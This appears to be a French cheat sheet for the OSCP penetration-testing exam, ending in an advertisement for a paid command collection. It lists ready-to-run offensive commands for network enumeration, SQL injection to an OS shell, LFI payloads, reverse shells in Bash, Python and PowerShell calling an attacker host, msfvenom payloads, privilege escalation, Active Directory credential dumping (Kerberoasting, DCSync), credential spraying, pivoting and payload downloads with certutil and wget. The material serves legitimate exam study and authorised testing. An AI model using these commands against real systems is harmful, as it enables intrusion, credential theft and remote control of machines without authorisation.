# Énumération
L'énumération, c'est tout dans l'OSCP. Passez 80% de votre temps ici. Scannez tous les ports, énumérez tous les services.
Nmap — Stratégie de scan complet
nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
Étape 1 : Scan rapide de tous les ports TCP pour découvrir les ports ouverts
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
Étape 2 : Scan ciblé avec scripts + détection de version sur les ports découverts
nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
N'oubliez pas l'UDP ! Scan des 200 ports UDP les plus courants
Énumération Web
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
Brute-force de répertoires avec extensions courantes (php, txt, bak sont précieux à l'OSCP)
whatweb http://TARGET && curl -s http://TARGET -I
Identifier les technologies web et les en-têtes serveur
nikto -h http://TARGET -C all
Scanner de vulnérabilités web — trouve les misconfigs et fichiers par défaut
Énumération SMB
smbclient -N -L //TARGET
Lister les partages SMB avec session null (sans mot de passe)
enum4linux-ng -A TARGET
Énumération complète SMB/RPC — utilisateurs, partages, groupes, politique de mots de passe
crackmapexec smb TARGET -u '' -p '' --shares
Énumérer les partages lisibles avec CrackMapExec
SNMP, LDAP, DNS
snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
SNMP walk avec communauté "public" — peut divulguer noms d'utilisateurs, processus
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
Requête LDAP anonyme pour énumérer les utilisateurs du domaine
dig axfr @TARGET DOMAIN.LOCAL
Tentative de transfert de zone DNS
# Exploitation Web
Injection SQL, contournement d'upload, injection de commandes — les fondamentaux des boxes web OSCP.
Injection SQL
sqlmap -u "http://TARGET/page?id=1" --batch --dbs
Détection automatique de SQLi — énumération des bases de données
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
SQLi depuis requête Burp — obtenir un shell OS si possible
Contournement d'upload de fichiers
cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
Contournement par double extension — upload en .php.jpg
Injection de commandes
; whoami
Test basique d'injection de commande (essayez aussi | whoami, `whoami`, $(whoami))
Inclusion de fichiers (LFI/RFI)
curl "http://TARGET/page?file=../../../etc/passwd"
LFI — lire /etc/passwd via traversée de répertoire
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
Wrapper PHP filter — lire le code source en base64
# Shells & Payloads
Reverse shells, bind shells et génération de payloads — apprenez-les par cœur pour l'examen.
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Reverse shell Bash — le classique
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Reverse shell Python3
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
Reverse shell PowerShell — pour les cibles Windows
Upgrade du shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Étape 1 : Spawn d'un shell PTY
export TERM=xterm && stty raw -echo; fg
Étape 2 : TTY interactif complet (Ctrl+Z d'abord, puis exécutez ceci)
Payloads Msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
EXE reverse shell Windows x64
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
Binaire ELF reverse shell Linux x64
# Escalade de privilèges Linux
L'OSCP adore le privesc Linux. Vérifiez SUID, capabilities, cron jobs, chemins inscriptibles, version du kernel.
💡 Conseil OSCP : Lancez toujours LinPEAS en premier. Puis vérifiez manuellement les résultats.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Exécuter LinPEAS directement — met en évidence les vecteurs de privesc en couleur
find / -perm -4000 -type f 2>/dev/null
Trouver tous les binaires SUID — vérifiez chacun sur GTFOBins
sudo -l
Vérifier ce que vous pouvez exécuter en root — le vecteur de privesc n°1
getcap -r / 2>/dev/null
Trouver les binaires avec capabilities (cap_setuid = root instantané)
cat /etc/crontab && ls -la /etc/cron*
Vérifier les cron jobs — scripts inscriptibles exécutés en root ?
find / -writable -type f 2>/dev/null | grep -v proc
Trouver les fichiers inscriptibles par tous — potentiel de hijacking de chemin
uname -a && cat /etc/os-release
Vérifier la version du kernel — chercher des exploits kernel
# Escalade de privilèges Windows
Services, tokens, AlwaysInstallElevated, chemins de services non quotés, potatoes — les classiques OSCP.
💡 Conseil OSCP : Lancez WinPEAS + PowerUp.ps1 — ensemble ils détectent la plupart des vecteurs.
.\winPEASx64.exe
WinPEAS — vérification automatisée d'escalade de privilèges Windows
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
PowerUp — trouve les misconfigurations, permissions faibles, chemins non quotés
whoami /priv
Vérifier les privilèges du token actuel — SeImpersonate ? SeBackup ?
.\GodPotato.exe -cmd "cmd /c whoami"
GodPotato — SYSTEM instantané depuis SeImpersonatePrivilege (fonctionne sur Windows récents)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Vérifier AlwaysInstallElevated — si 1, générer un payload MSI pour SYSTEM
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
Trouver les chemins de services non quotés — potentiel de hijacking de binaire
# Active Directory
L'AD est une partie majeure de l'OSCP depuis la mise à jour 2023. Kerberoasting, AS-REP roasting, DCSync et mouvement latéral.
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
Collecte BloodHound — cartographier tous les chemins d'attaque AD
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
Kerberoasting — extraire les hash de tickets de service pour cracking offline
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
AS-REP Roasting — trouver les comptes sans pré-authentification Kerberos
impacket-psexec domain.local/ADMIN:PASS@TARGET_IP
PsExec — obtenir un shell SYSTEM avec des identifiants admin valides
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
DCSync — extraire tous les hash du domaine (nécessite DA ou droits de réplication)
evil-winrm -i TARGET_IP -u USER -p PASS
Shell WinRM — fonctionne quand le port 5985 est ouvert
crackmapexec smb SUBNET/24 -u USER -p PASS --shares
Spray d'identifiants sur le réseau — trouver où vous avez accès
# Pivoting & Tunneling
Atteindre les réseaux internes via les machines compromises. Chisel, tunnels SSH, ligolo — indispensable pour l'OSCP.
Chisel (Recommandé)
./chisel server -p 8080 --reverse
Sur votre Kali : démarrer le serveur Chisel en mode reverse
./chisel client ATTACKER_IP:8080 R:socks
Sur la cible : connexion retour, crée un proxy SOCKS5 sur le port 1080 de Kali
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
Scanner le réseau interne via le proxy SOCKS
Tunnels SSH
ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
Port forward local — accéder au web interne sur localhost:8080
ssh -D 1080 user@PIVOT_IP
Proxy SOCKS dynamique via SSH — utiliser avec proxychains
# Attaques de mots de passe
Cracker des hash, brute-forcer des logins — hashcat et John sont vos meilleurs alliés.
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
Cracker les hash Kerberoast (TGS-REP type 23)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
Cracker les hash AS-REP roast
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
John the Ripper — détecte automatiquement le type de hash et cracke
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
Brute-force de login web avec Hydra
# Transferts de fichiers
Transférer des outils sur la cible et exfiltrer des données. Plusieurs méthodes pour différentes situations.
Cibles Linux
python3 -m http.server 8000
Sur Kali : démarrer un serveur HTTP pour servir des fichiers
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
Sur la cible : télécharger et rendre exécutable
Cibles Windows
certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
Téléchargement avec Certutil — fonctionne sur la plupart des versions Windows
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
Téléchargement PowerShell — alternative à certutil
# Conseils pour l'examen OSCP
Stratégie et état d'esprit pour les 23h45 d'examen. Ces conseils viennent de centaines d'expériences OSCP.
⏱️ Gestion du temps : Ne passez pas plus de 2 heures sur une seule machine. Si vous êtes bloqué, passez à autre chose et revenez plus tard avec un regard neuf.
📝 Documentez tout : Faites des captures d'écran à chaque étape. Ne laissez pas le rapport pour la fin — collez les preuves dans votre template pendant l'examen.
🎯 Commencez par les boxes faciles : Les machines standalone (non-AD) sont souvent plus rapides à rooter. Sécurisez ces points d'abord.
🔁 Énumérez plus profondément : Si vous êtes bloqué, vous n'avez pas assez énuméré. Relancez les scans avec d'autres wordlists, revérifiez tous les ports, regardez le code source.
🏠 Set AD = 40 points : La chaîne AD est le plus gros bloc de points. Entraînez-vous sur les boxes AD de HackTheBox et TryHackMe avant l'examen.
💤 Prenez des pauses : Dormez 2 à 4 heures pendant l'examen. Revenir reposé permet souvent de résoudre ce qui vous bloquait.
Vous voulez les 11 600+ commandes ?
Cette cheatsheet n'est que la surface. Pentest Mindmap organise 11 600+ commandes dans 32 catégories avec recherche instantanée et copie en un clic.
Essai gratuit de 7 jours →